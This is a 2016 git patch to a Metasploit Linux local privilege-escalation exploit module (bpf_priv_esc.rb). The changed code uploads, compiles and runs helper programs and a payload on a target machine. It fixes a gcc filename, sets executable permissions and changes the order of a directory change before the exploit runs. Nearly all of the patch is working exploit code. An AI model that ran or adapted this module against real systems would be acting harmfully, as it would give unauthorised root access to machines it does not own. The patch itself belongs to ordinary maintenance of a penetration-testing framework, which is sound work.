From bac4a25b2ca6570ae8671d4c22c643fa0559cf7c Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 29 Sep 2016 06:15:17 -0400 Subject: [PATCH] compile or nill --- modules/exploits/linux/local/bpf_priv_esc.rb | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/local/bpf_priv_esc.rb b/modules/exploits/linux/local/bpf_priv_esc.rb index 5306dd3ad1..7fe2335381 100644 --- a/modules/exploits/linux/local/bpf_priv_esc.rb +++ b/modules/exploits/linux/local/bpf_priv_esc.rb @@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Writing #{filename} to #{file_path}.c") write_file("#{file_path}.c", file_content) register_file_for_cleanup("#{file_path}.c") - output = cmd_exec(compile) #"gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`") + output = cmd_exec(compile) if output != '' print_error(output) fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile") @@ -127,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Writing #{filename} to #{file_path}") write_file(file_path, file_content) end + cmd_exec("chmod +x #{file_path}"); register_file_for_cleanup(file_path) end @@ -464,15 +465,15 @@ class MetasploitModule < Msf::Exploit::Local doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/, 'exit(0);') print_status('Writing files to target') + cmd_exec("cd #{datastore['WritableDir']}") upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil) - upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_filename} #{doubleput_filename}.c -Wall" : nil) + upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil) upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil) upload_and_compile('payload', payload_path, generate_payload_exe) - cmd_exec("chmod 555 #{payload_filename}") - cmd_exec("cd #{datastore['WritableDir']}") + #cmd_exec("chmod 555 #{payload_filename}") print_status('Starting execution of priv esc. This may take about 120 seconds') - cmd_exec("chmod +x #{doubleput_file}; #{doubleput_file}") # we use & to not destroy our original shell + cmd_exec(doubleput_file) sec_waited = 0 until sec_waited > datastore['MAXWAIT'] do Rex.sleep(1)